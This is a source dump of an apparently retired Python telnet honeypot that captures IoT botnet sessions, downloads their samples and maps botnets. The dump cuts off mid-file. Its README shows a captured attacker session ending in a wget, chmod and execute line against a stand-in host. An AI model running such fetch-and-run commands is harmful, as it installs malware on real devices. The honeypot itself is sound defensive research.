[
  {
    "path": ".gitignore",
    "content": "*.pyc\n*.db\nsamples/\nMirai-Source-Code-master/\nobf.py\nimport-lost-conns.py\nimport-length.py\nreview-sampels.py\n*.kate-swp\n*.sql\n*.log\nconfig.yaml\n"
  },
  {
    "path": "Dockerfile",
    "content": "FROM python:2\n\nWORKDIR /usr/src/app\n\nCOPY ./requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\nRUN pip install mysqlclient\n\nCOPY . .\n\nRUN apt update && apt install -y sqlite3\n"
  },
  {
    "path": "INSTALL.md",
    "content": "# Installation\n\nFor installation instructions, go to section Manual installation.\nHowever, if you just want to get everythig running, there is\nalso a Vagrantfile. See Section Vagrent for that.\n\n# Vagrant\n\nThere is a Vagrantfile in the folder vagrant/ you can use to just make\na basic deployment with honeypot + backend + sqlite running.\n\nInstall vagrant and vagrant virtualbox porvider,\nthen go to vagrant folder and type `vagrant up`.\nAfter a while the box should run a honeypot + backend available\nvia port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`.\n\n# Manual installation\nconfirmed to work with Ubuntu 16.04.2 LTS\n\nInstall all requirements:\n\n```\napt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3\n\ngit clone https://github.com/Phype/telnet-iot-honeypot.git\ncd telnet-iot-honeypot\npip install -r requirements.txt\n```\n\n\tsudo apt-get install python-setuptools python-werkzeug \\\n\t\tpython-flask python-flask-httpauth python-sqlalchemy \\\n\t\tpython-requests python-decorator python-dnspython \\\n\t\tpython-ipaddress python-simpleeval python-yaml\n\nIf you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes,\nso it is recommended to use latin1 charset, else the db setup will fail.\n\n```\napt-get install mysql-server mysql-client\nsudo mysql_secure_installation\n\nmysql\nCREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci;\ngrant all privileges on telhoney.* to telhoney@localhost identified by \"YOUR_PASSWORD\";\nflush privileges;\n```\n\n## Configuration\n\nThis software consists of 2 components, a honeypot (client) and a backend (server).\nThe honeypot will accept incoming telnet connections and may download samples\nwhich an adversary may try to download in the telnet session. 
When a session is\nclosed, the honeypot will post all data about the connection to the backend using\na REST-API.\n\nThe configuration for both honeypot and backend is in the files\n`config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default\nconfig. If you want to change anything, change or create overriding entries in\n`config.yaml`. If you need documentation about the configuration,\nthe file `config.dist.yaml` contains some comments.\n\nThe REST-API requires authentication (HTTP Basic Auth).\nWhen the backend is started for the first time,\nit will create a \"users\" table in the database containing an \"admin\" user.\nThe admin user's password is read from the configuration file.\nIf the configuration file is empty, it will be created with random credentials.\n\n*TL;DR*: The default config should just work; if you need the credentials for the\nadmin user, see the file `config.yaml`.\n\n## Running\n\nCreate a config:\n\n\tbash create_config.sh\n\nStart the backend:\n\n\tpython backend.py\n\nNow, start the honeypot:\n\n\tpython honeypot.py\n\nNow you can test the honeypot:\n\n\ttelnet 127.0.0.1 2223\n\n## HTML Frontend\n\nYou can use the frontend by just opening the file html/index.html in your browser.\nIf you want to make the frontend publicly available, deploy the html/ folder to your webserver,\nor install one:\n\n```\nsudo apt-get install apache2\ncd telnet-iot-honeypot\ncp -R html /var/www\nsudo chown www-data:www-data /var/www -R\n```\n\n## Virustotal integration\n\nPlease get your own virustotal key,\nsince mine only allows for 4 API requests/min.\n\nFor how to do this, see https://www.virustotal.com/de/faq/#virustotal-api\n\nOnce you have one, put it in your config.yaml and enable virustotal integration:\n\n\tvt_key: \"GET_YOUR_OWN\"\n\tsubmit_to_vt: true\n\nIf you want to import virustotal reports of the collected samples,\nrun (you may have to restart because of db locks). *TODO*: test if this still works\n\n\tpython virustotal_fill_db.php\n\n"
  },
  {
    "path": "README.md",
    "content": "## Disclaimer\n\nThis project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! \n\n# Telnet IoT honeypot\n\n'Python telnet honeypot for catching botnet binaries'\n\nThis project implements a python telnet server trying to act\nas a honeypot for IoT Malware which spreads over horribly\ninsecure default passwords on telnet servers on the internet.\n\nThe honeypot works by emulating a shell enviroment, just like \ncowrie (https://github.com/micheloosterhof/cowrie).\nThe aim of this project is primarily to automatically analyse\nBotnet connections and \"map\" Botnets by linking diffrent\nconnections and even Networks together.\n\n## Architecture\n\nThe application has a client/server architecture,\nwith a client (the actual honeypot) accepting telnet connections\nand a server which receives information about connections and\ndoes the analysis.\n\nThe backend server exposes a HTTP interface which is used\nto access to frontend as well as by the clients to push new\nConnection information to the backend.\n\n## Automatic analysis\n\nThe Backend uses 2 diffrent mechanisms to automatically link\nconnections:\n\n### Networks\n\nNetworks are discovered Botnets. A network is the set of all linked\nconnections, urls and samples. Urls and samples\nare linked when they are used in a connection. Two connections are linked\nwhen both connections are recieved by the same honeypot client\n(mutliple clients are supported!) and use the same credentials in a short\nperiod of time (defautl 2 minutes) or come from the same IP address.\n\n### Malware\n\nMultiple networks are identified to use the same type of malware\nif the text entered during sessions of the networks aro mostly the\nsame. 
This comparison is done using a sort of \"hash\" function which\nbasically translates a session (or connection) into a sequence\nof words and then maps each word to a single byte, so that the resulting\nsequence of bytes can be easily searched.\n\n# Running\n\nThe application has a config file named config.yaml.\nSample configs are included for local and client/server deployments.\n\n## Configuration\n\nThe backend requires an SQL database (default sqlite) which is initialized\nat first run. Before the first run you should generate an admin account\nwhich is used to generate more users. The admin account can also be used directly\nby a client to post connections. When more than one honeypot shall be\nconnected, creating multiple users is recommended.\n\n\tbash create_config.sh\n\nBoth client and backend read the files `config.yaml` and `config.dist.yaml`\nfor configuration parameters. The `config.dist.yaml` file includes\ndefault values for all but the admin user credentials, and these parameters\nare overridden by entries in the `config.yaml` file.\n\n## Running the Server\n\n\tpython backend.py\n\n## Running the Client\n\nThis project contains its own honeypot; however, because of the client-server architecture,\nother honeypots can be used as well.\n\n### Using the built-in honeypot\n\n\tpython honeypot.py\n\nThe client cannot be started without the server running. 
To use a different configuration\nfor the client you can use the `-c` switch like this:\n\n\tpython honeypot.py -c myconfig.yaml\n\nIf you only want to check the honeypot functionality,\nyou can start the client in interactive mode:\n\n\tpython honeypot.py shell\n\n### Using cowrie\n\nI wrote an output plugin for cowrie, which has many more features than the built-in honeypot.\nIf you want to use cowrie instead, check out my fork which includes the output module here:\nhttps://github.com/Phype/cowrie.\n\n## Opening the frontend\n\nAfter the server is started, open `http://127.0.0.1/` in your favorite browser.\n\n## Sample Connection\n\n\tenable\n\tshell\n\tsh\n\tcat /proc/mounts; /bin/busybox PEGOK\n\tcd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK\n\tnc; wget; /bin/busybox PEGOK\n\t(dd bs=52 count=1 if=.s || cat .s)\n\t/bin/busybox PEGOK\n\trm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit\n\n## Images\n\n![Screenshot 1](images/screen1.png)\n\n![Screenshot 2](images/screen2.png)\n\n![Screenshot 3](images/screen3.png)\n"
  },
  {
    "path": "backend/__init__.py",
    "content": ""
  },
  {
    "path": "backend/additionalinfo.py",
    "content": "import dns.resolver\nimport ipaddress\nimport urlparse\nimport re\nimport traceback\n\nimport ipdb.ipdb\n\ndef filter_ascii(string):\n\t\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \"\\r\\n \")\n\t\treturn string\n\ndef query_txt(cname):\n\ttry:\n\t\tanswer = dns.resolver.query(filter_ascii(cname), \"TXT\")\n\n\t\tfor rr in answer.rrset:\n\t\t\tif rr.strings: return rr.strings[0]\n\texcept Exception as e:\n\t\ttraceback.print_exc()\n\t\tpass\n\n\treturn None\n\ndef query_a(cname):\n\ttry:\n\t\tanswer = dns.resolver.query(filter_ascii(cname), \"A\")\n\n\t\tfor data in answer:\n\t\t\tif data.address: return data.address\n\texcept:\n\t\ttraceback.print_exc()\n\t\tpass\n\n\treturn None\n\ndef txt_to_ipinfo(txt):\n\tparts = txt.split(\"|\")\n\n\treturn {\n\t\t\"asn\":     filter_ascii(parts[0].strip()),\n\t\t\"ipblock\": filter_ascii(parts[1].strip()),\n\t\t\"country\": filter_ascii(parts[2].strip()),\n\t\t\"reg\":     filter_ascii(parts[3].strip()),\n\t\t\"updated\": filter_ascii(parts[4].strip())\n\t}\n\ndef txt_to_asinfo(txt):\n\tparts = txt.split(\"|\")\n\t\n\treturn {\n\t\t\"asn\":     filter_ascii(parts[0].strip()),\n\t\t\"country\": filter_ascii(parts[1].strip()),\n\t\t\"reg\":     filter_ascii(parts[2].strip()),\n\t\t\"updated\": filter_ascii(parts[3].strip()),\n\t\t\"name\":    filter_ascii(parts[4].strip())\n\t}\n\ndef get_ip4_info(ip):\n\toktets  = ip.split(\".\")\n\treverse = oktets[3] + \".\" + oktets[2] + \".\" + oktets[1] + \".\" + oktets[0]\n\t\n\tanswer = query_txt(reverse + \".origin.asn.cymru.com\")\n\n\tif answer:\n\t\treturn txt_to_ipinfo(answer)\n\t\n\treturn None\n\ndef get_ip6_info(ip):\n\tip = ipaddress.ip_address(unicode(ip))\n\tip = list(ip.exploded.replace(\":\", \"\"))\n\t\n\tip.reverse()\n\t\n\treverse = \".\".join(ip)\n\t\n\tanswer = query_txt(reverse + \".origin6.asn.cymru.com\")\n\tif answer:\n\t\treturn txt_to_ipinfo(answer)\n\t\n\treturn None\n\ndef 
get_ip_info(ip):\n\tis_v4 = \".\" in ip\n\tis_v6 = \":\" in ip\n\t\n\tif is_v4:\n\t\treturn get_ip4_info(ip)\n\telif is_v6:\n\t\treturn get_ip6_info(ip)\n\telse:\n\t\tprint(\"Cannot parse ip \" + ip)\n\t\treturn None\n\ndef get_asn_info(asn):\n\tanswer = query_txt(\"AS\" + str(asn) + \".asn.cymru.com\")\n\tif answer:\n\t\treturn txt_to_asinfo(answer)\n\t\n\treturn None\n\ndef get_url_info(url):\n\ttry:\n\t\tparsed = urlparse.urlparse(url)\n\t\tnetloc = parsed.netloc\n\t\tip     = None\n\t\t\n\t\t# IPv6\n\t\tif \"[\" in netloc:\n\t\t\tnetloc = re.match(\"\\\\[(.*)\\\\]\", netloc).group(1)\n\t\t\tip = netloc\n\t\t\t\n\t\t# IPv4 / domain name\n\t\telse:\n\t\t\tif \":\" in netloc:\n\t\t\t\tnetloc = re.match(\"(.*?):\", netloc).group(1)\n\t\t\t\n\t\t\tif re.match(\"[a-zA-Z]\", netloc):\n\t\t\t\tip = query_a(netloc)\n\t\t\telse:\n\t\t\t\tip = netloc\n\t\t\n\t\treturn ip, get_ip_info(ip)\n\t\n\texcept:\n\t\ttraceback.print_exc()\n\t\tpass\n\t\n\treturn None\n\nif __name__ == \"__main__\":\n\tprint get_ip_info(\"79.220.249.125\")\n\tprint get_ip_info(\"2a00:1450:4001:81a::200e\")\n\tprint get_asn_info(3320)\n\n\tprint get_url_info(\"http://google.com\")\n\tprint get_url_info(\"http://183.144.16.51:14722/.i\")\n\tprint get_url_info(\"http://[::1]:14722/.i\")\n"
  },
  {
    "path": "backend/authcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_\nfrom decorator import decorator\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nclass AuthController:\n\n\tdef __init__(self):\n\t\tself.session = None\n\t\tself.salt    = config.get(\"backend_salt\")\n\t\tself.checkInitializeDB()\n\n\tdef pwhash(self, username, password):\n\t\treturn argon2_hash(str(password), self.salt + str(username), buflen=32).encode(\"hex\")\n\n\t@db_wrapper\n\tdef checkInitializeDB(self):\n\t\tuser = self.session.query(User).filter(User.id == 1).first()\n\t\tif user == None:\n\t\t\tadmin_name = config.get(\"backend_user\")\n\t\t\tadmin_pass = config.get(\"backend_pass\")\n\n\t\t\tprint 'Creating admin user \"' + admin_name + '\" see config for password'\n\t\t\tself.addUser(admin_name, admin_pass, 1)\n\n\t@db_wrapper\n\tdef getUser(self, username):\n\t\tuser = self.session.query(User).filter(User.username == username).first()\n\t\treturn user.json(depth=1) if user else None\n\n\t@db_wrapper\n\tdef addUser(self, username, password, id=None):\n\t\tuser = User(username=username, password=self.pwhash(username, password))\n\t\tif id != None:\n\t\t\tuser.id = id\n\t\tself.session.add(user)\n\t\treturn user.json()\n\n\t@db_wrapper\n\tdef checkAdmin(self, user):\n\t\tuser = self.session.query(User).filter(User.username == user).first()\n\t\tif user == None:\n\t\t\treturn False\n\t\treturn user.id == 1\n\n\t@db_wrapper\n\tdef checkLogin(self, username, password):\n\t\tuser = self.session.query(User).filter(User.username == 
username).first()\n\t\tif user == None:\n\t\t\treturn False\n\t\treturn self.pwhash(username, password) == user.password\n"
  },
  {
    "path": "backend/backend.py",
    "content": "from flask import Flask, request, Response, redirect, send_from_directory\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_socketio import SocketIO\n\nauth = HTTPBasicAuth()\n\nfrom db import get_db\n\nfrom clientcontroller import ClientController\nfrom webcontroller import WebController\nfrom authcontroller import AuthController\n\nfrom util.config import config\n\nimport os\nimport json\nimport base64\nimport time\nimport signal\n\napp  = Flask(__name__)\n\nctrl     = ClientController()\nweb      = WebController()\nauthctrl = AuthController()\nsocketio = SocketIO(app)\n\napp.debug = True\n\ndef red(obj, attributes):\n\tif not obj:\n\t\treturn None\n\tres = {}\n\tfor a in attributes:\n\t\tif a in obj:\n\t\t\tres[a] = obj[a]\n\treturn res\n\n###\n#\n# Globals\n#\n###\n\n\nSECS_PER_MONTH = 3600 * 24 * 31\n\n@app.after_request\ndef add_cors(response):\n    response.headers[\"Access-Control-Allow-Origin\"]  = \"*\"\n    response.headers[\"Access-Control-Allow-Methods\"] = \"GET, POST, PUT, DELETE\"\n    response.headers[\"Access-Control-Allow-Headers\"] = \"Authorization, Content-type\"\n    return response\n\n@auth.verify_password\ndef verify_password(username, password):\n\treturn authctrl.checkLogin(username, password)\n\n###\n#\n# Index\n#\n###\n\n@app.route('/')\ndef send_index():\n\treturn redirect('/html/index.html')\n\n@app.route('/html/<path:filename>')\ndef serve_static(filename):\n\troot_dir = os.getcwd()\n\treturn send_from_directory(os.path.join(root_dir, 'html'), filename)\n\n###\n#\n# Admin API\n#\n###\n\n@app.route(\"/user/<username>\", methods = [\"PUT\"])\n@auth.login_required\ndef add_user(username):\n\tif authctrl.checkAdmin(auth.username()):\n\t\tuser = request.json\n\t\tif user[\"username\"] != username:\n\t\t\treturn \"username mismatch in url/data\", 500\n\t\treturn json.dumps(authctrl.addUser(user[\"username\"], user[\"password\"]))\n\telse:\n\t\treturn \"Authorization required\", 401\n\n###\n#\n# Upload 
API\n#\n###\n\n@app.route(\"/login\")\n@auth.login_required\ndef test_login():\n\treturn \"LOGIN OK\"\n\n@app.route(\"/conns\", methods = [\"PUT\"])\n@auth.login_required\ndef put_conn():\n\tsession = request.json\n\tsession[\"backend_username\"] = auth.username()\n\n\tprint(\"--- PUT SESSION ---\")\n\tprint(json.dumps(session))\n\n\tsession = ctrl.put_session(session)\n\tsocketio.emit('session', session)\n\n\treturn json.dumps(session)\n\n@app.route(\"/sample/<sha256>\", methods = [\"PUT\"])\n@auth.login_required\ndef put_sample_info(sha256):\n\tsample = request.json\n\n\treturn json.dumps(ctrl.put_sample_info(sample))\n\n@app.route(\"/sample/<sha256>/update\", methods = [\"GET\"])\n@auth.login_required\ndef update_sample(sha256):\n\treturn json.dumps(ctrl.update_vt_result(sha256))\n\n@app.route(\"/file\", methods = [\"POST\"])\n@auth.login_required\ndef put_sample():\n\tdata   = request.get_data()\n\t\n\treturn json.dumps(ctrl.put_sample(data))\n\n###\n#\n# Public API\n#\n###\n\ndef fail(msg = \"\", code = 400):\n\tobj = {\"ok\" : False, \"msg\" : msg}\n\treturn Response(json.dumps(obj), status=code, mimetype='application/json')\n\n### Networks\n\n@app.route(\"/housekeeping\", methods = [\"GET\"])\ndef housekeeping():\n\tctrl.do_housekeeping()\n\treturn \"DONE\"\n\n@app.route(\"/networks\", methods = [\"GET\"])\ndef get_networks():\n\treturn json.dumps(web.get_networks())\n\n@app.route(\"/network/<net_id>\", methods = [\"GET\"])\ndef get_network(net_id):\n\treturn json.dumps(web.get_network(net_id))\n\n@app.route(\"/network/<net_id>/locations\", methods = [\"GET\"])\ndef get_network_locations(net_id):\n\tnow = int(time.time())\n\tloc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id))\n\treturn json.dumps(loc)\n\n@app.route(\"/network/<net_id>/history\", methods = [\"GET\"])\ndef get_network_history(net_id):\n\t\n\tnot_before = request.args.get(\"not_before\")\n\tnot_after  = request.args.get(\"not_after\")\n\t\n\tif not_before == None or 
not_after == None:\n\t\tnot_after  = int(time.time())\n\t\tnot_before = not_after - SECS_PER_MONTH\n\telse:\n\t\tnot_before = int(not_before)\n\t\tnot_after  = int(not_after)\n\t\t\n\td = web.get_network_history(not_before, not_after, int(net_id))\n\treturn json.dumps(d)\n\n@app.route(\"/network/biggest_history\", methods = [\"GET\"])\ndef get_network_biggest_history():\n\t\n\tnot_before = request.args.get(\"not_before\")\n\tnot_after  = request.args.get(\"not_after\")\n\t\n\tif not_before == None or not_after == None:\n\t\tnot_after  = int(time.time())\n\t\tnot_before = not_after - SECS_PER_MONTH\n\telse:\n\t\tnot_before = int(not_before)\n\t\tnot_after  = int(not_after)\n\t\t\n\td = web.get_biggest_networks_history(not_before, not_after)\n\treturn json.dumps(d)\n\n\n### Malwares\n\n@app.route(\"/malwares\", methods = [\"GET\"])\ndef get_malwares():\n\treturn json.dumps(web.get_malwares())\n\n### Samples\n\n@app.route(\"/sample/<sha256>\")\ndef get_sample(sha256):\n\tsample = web.get_sample(sha256)\n\tif sample:\n\t\treturn json.dumps(sample)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/sample/newest\")\ndef get_newest_samples():\n\tsamples = web.get_newest_samples()\n\treturn json.dumps(samples)\n\t\t\n### Urls\n\n@app.route(\"/url/<ref_enc>\", methods = [\"GET\"])\ndef get_url(ref_enc):\n\tref = base64.b64decode(ref_enc)\n\tprint(\"\\\"\" + ref_enc + \"\\\" decodes to \\\"\" + ref + \"\\\"\")\n\t\n\turl = web.get_url(ref)\n\tif url:\n\t\treturn json.dumps(url)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/url/newest\")\ndef get_newest_urls():\n\turls = web.get_newest_urls()\n\treturn json.dumps(urls)\n\t\t\n### connections\n\n@app.route(\"/connection/<id>\")\ndef get_connection(id):\n\tconn = web.get_connection(id)\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/connections\")\ndef get_connections():\n\tobj          = {}\n\tallowed_keys = [\"ipblock\", \"user\", \"password\", \"ip\", \"country\", \"asn_id\", 
\"network_id\"]\n\t\n\tfor k,v in request.args.iteritems():\n\t\tif k in allowed_keys:\n\t\t\tobj[k] = v\n\t\n\tconn = web.get_connections(obj, request.args.get(\"older_than\", None))\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\n@app.route(\"/connections_fast\")\ndef get_connections_fast():\n\tconn = web.get_connections_fast()\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/connection/statistics/per_country\")\ndef get_country_stats():\n\tstats = web.get_country_stats()\n\treturn json.dumps(stats)\n\n@app.route(\"/connection/by_country/<country>\")\ndef get_country_connections(country):\n\tolder_than = request.args.get('older_than', None)\n\tstats = web.get_country_connections(country, older_than)\n\treturn json.dumps(stats)\n\n@app.route(\"/connection/by_ip/<ip>\")\ndef get_ip_connections(ip):\n\tolder_than = request.args.get('older_than', None)\n\tstats = web.get_ip_connections(ip, older_than)\n\treturn json.dumps(stats)\n\t\n@app.route(\"/connection/newest\")\ndef get_newest_connections():\n\tconnections = web.get_newest_connections()\n\treturn json.dumps(connections)\n\n@app.route(\"/connection/locations\")\ndef get_connection_locations():\n\tnow   = int(time.time())\n\tloc   = web.get_connection_locations(now - SECS_PER_MONTH, now)\n\treturn json.dumps(loc)\n\n### Tags\n\n@app.route(\"/tag/<name>\")\ndef get_tag(name):\n\ttag = web.get_tag(name)\n\tif tag:\n\t\treturn json.dumps(tag)\n\telse:\n\t\treturn \"\", 404\n\n@app.route(\"/tags\")\ndef get_tags():\n\ttags = web.get_tags()\n\treturn json.dumps(tags)\n\n### Hist\n\n@app.route(\"/connhashtree/<layers>\")\ndef connhash_tree(layers):\n\treturn json.dumps(web.connhash_tree(int(layers)))\n\t\t\n### ASN\n\n@app.route(\"/asn/<asn>\")\ndef get_asn(asn):\n\tinfo = web.get_asn(asn)\n\tif not info:\n\t\treturn \"\", 404\n\t\n\treturn json.dumps(info)\n\ndef run():\n\tsignal.signal(15, stop)\n\n\tapp.run(host=config.get(\"http_addr\"), 
port=config.get(\"http_port\"),threaded=True)\n\t#socketio.run(app, host=config.get(\"http_addr\"), port=config.get(\"http_port\"))\n\ndef stop():\n\tprint \"asdasdasd\"\n\nif __name__ == \"__main__\":\n\trun()\n"
  },
  {
    "path": "backend/clientcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport socket\nimport urlparse\nimport random\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_\nfrom decorator import decorator\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nANIMAL_NAMES = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Lemur\",\"Addax\",\"Colt\",\n\t\t\t\t\"Whale\",\"Dormouse\",\"Budgerigar\",\"Dugong\",\"Squirrel\",\"Okapi\",\"Burro\",\"Fish\",\"Crocodile\",\"Finch\",\"Bison\",\"Gazelle\",\"Basilisk\",\n\t\t\t\t\"Puma\",\"Rooster\",\"Moose\",\"Musk Deer\",\"Thorny Devil\",\"Gopher\",\"Gnu\",\"Panther\",\"Porpoise\",\"Lamb\",\"Parakeet\",\"Marmoset\",\"Coati\",\n\t\t\t\t\"Alligator\",\"Elk\",\"Antelope\",\"Kitten\",\"Capybara\",\"Mule\",\"Mouse\",\"Civet\",\"Zebu\",\"Horse\",\"Bald Eagle\",\"Raccoon\",\"Pronghorn\",\n\t\t\t\t\"Parrot\",\"Llama\",\"Tapir\",\"Duckbill Platypus\",\"Cow\",\"Ewe\",\"Bighorn\",\"Hedgehog\",\"Crow\",\"Mustang\",\"Panda\",\"Otter\",\"Mare\",\n\t\t\t\t\"Goat\",\"Dingo\",\"Hog\",\"Mongoose\",\"Guanaco\",\"Walrus\",\"Springbok\",\"Dog\",\"Kangaroo\",\"Badger\",\"Fawn\",\"Octopus\",\"Buffalo\",\"Doe\",\n\t\t\t\t\"Camel\",\"Shrew\",\"Lovebird\",\"Gemsbok\",\"Mink\",\"Lynx\",\"Wolverine\",\"Fox\",\"Gorilla\",\"Silver Fox\",\"Wolf\",\"Ground Hog\",\"Meerkat\",\n\t\t\t\t\"Pony\",\"Highland Cow\",\"Mynah Bird\",\"Giraffe\",\"Cougar\",\"Eland\",\"Ferret\",\"Rhinoceros\"]\n\n# Controls Actions perfomed by Honeypot Clients\nclass ClientController:\n\n\tdef __init__(self):\n\t\tself.session  = 
None\n\t\tif config.get(\"submit_to_vt\"):\n\t\t\tself.vt = Virustotal(config.get(\"vt_key\", optional=True))\n\t\telse:\n\t\t\tself.vt = None\n\t\tself.cuckoo   = Cuckoo(config)\n\t\t\n\t\tself.do_ip_to_asn_resolution = False\n\t\tself.ip2asn = config.get(\"ip_to_asn_resolution\", optional=True, default=True)\n\t\tif self.ip2asn == \"offline\":\n\t\t\tself.do_ip_to_asn_resolution = True\n\t\t\tself.fill_db_ipranges()\n\t\tif self.ip2asn == \"online\":\n\t\t\tself.do_ip_to_asn_resolution = True\n\n\t@db_wrapper\n\tdef _get_asn(self, asn_id):\n\t\tasn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first()\n\t\t\n\t\tif asn_obj:\n\t\t\treturn asn_obj\n\t\telse:\n\t\t\tasn_info = additionalinfo.get_asn_info(asn_id)\n\t\t\tif asn_info:\n\t\t\t\tasn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country'])\n\t\t\t\tself.session.add(asn_obj)\n\t\t\t\treturn asn_obj\n\t\t\t\n\t\treturn None\n\n\tdef calc_connhash_similiarity(self, h1, h2):\n\t\tl = min(len(h1), len(h2))\n\t\tr = 0\n\t\tfor i in range(0, l):\n\t\t\tr += int(h1[i] != h2[i])\n\n\t\tif l == 0: return 0\n\t\treturn float(r)/float(l)\n\n\tdef calc_connhash(self, stream):\n\t\toutput = \"\"\n\t\tfor event in stream:\n\t\t\tif event[\"in\"]:\n\t\t\t\tline  = event[\"data\"]\n\t\t\t\tline  = line.strip()\n\t\t\t\tparts = line.split(\" \")\n\t\t\t\tfor part in parts:\n\t\t\t\t\tpart_hash = chr(hash(part) % 0xFF)\n\t\t\t\t\toutput += part_hash\n\n\t\t# Max db len is 256, half because of hex encoding\n\t\treturn output[:120]\n\n\t@db_wrapper\n\tdef fill_db_ipranges(self):\t\t\n\t\tif self.session.query(IPRange.ip_min).count() != 0:\n\t\t\treturn\n\t\t\n\t\tprint \"Filling IPRange Tables\"\n\t\t\n\t\tasntable = ipdb.ipdb.get_asn()\n\t\tprogress = 0\n\t\t\n\t\tfor row in ipdb.ipdb.get_geo_iter():\n\t\t\tprogress += 1\n\t\t\tif progress % 1000 == 0:\n\t\t\t\tself.session.commit()\n\t\t\t\tself.session.flush()\n\t\t\t\tprint str(100.0 * float(row[0]) / 4294967296.0) + \"% / 
\" + str(100.0 * progress / 3315466) + \"%\" \n\t\t\t\n\t\t\tip = IPRange(ip_min = int(row[0]), ip_max=int(row[1]))\n\t\t\t\n\t\t\tip.country   = row[2]\n\t\t\tip.region    = row[4]\n\t\t\tip.city      = row[5]\n\t\t\tip.zipcode   = row[8]\n\t\t\tip.timezone  = row[9]\n\t\t\tip.latitude  = float(row[6])\n\t\t\tip.longitude = float(row[7])\n\t\t\t\n\t\t\tasn_data = asntable.find_int(ip.ip_min)\n\t\t\t\n\t\t\tif asn_data:\n\t\t\t\tasn_id = int(asn_data[3])\n\t\t\t\tasn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first()\n\t\t\t\t\n\t\t\t\tif asn_db == None:\n\t\t\t\t\tasn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country)\n\t\t\t\t\tself.session.add(asn_db)\n\t\t\t\t\n\t\t\t\tip.asn = asn_db\n\t\t\t\t\n\t\t\t\t# Dont add session if we cannot find an asn for it\n\t\t\t\tself.session.add(ip)\n\t\t\n\t\tprint \"IPranges loaded\"\n\t\t\n\t@db_wrapper\n\tdef get_ip_range_offline(self, ip):\n\t\tip_int = ipdb.ipdb.ipstr2int(ip)\n\t\t\n\t\trange = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int, \n\t\t\tip_int <= IPRange.ip_max)).first()\n\t\t\n\t\treturn range\n\n\tdef get_ip_range_online(self, ip):\n\t\t\n\t\taddinfo = additionalinfo.get_ip_info(ip)\n\t\t\n\t\tif addinfo:\n\t\t\n\t\t\t# TODO: Ugly hack\n\t\t\trange = type('',(object,),{})()\n\t\t\t\n\t\t\trange.country   = addinfo[\"country\"]\n\t\t\trange.city      = \"Unknown\"\n\t\t\trange.latitude  = 0\n\t\t\trange.longitude = 0\n\t\t\trange.asn_id    = int(addinfo[\"asn\"])\n\t\t\trange.asn       = self._get_asn(range.asn_id)\n\t\t\trange.cidr      = addinfo[\"ipblock\"]\n\t\t\t\n\t\t\treturn range\n\t\t\n\t\telse:\n\t\t\t\n\t\t\treturn None\n\n\tdef get_ip_range(self, ip):\n\t\tif self.ip2asn == \"online\":\n\t\t\treturn self.get_ip_range_online(ip)\n\t\telse:\n\t\t\treturn self.get_ip_range_offline(ip)\n\t\t\n\tdef get_url_info(self, url):\n\t\tparsed = urlparse.urlparse(url)\n\t\thost   = parsed.netloc.split(':')[0]\n\t\t\n\t\tif host[0].isdigit():\n\t\t\tip = 
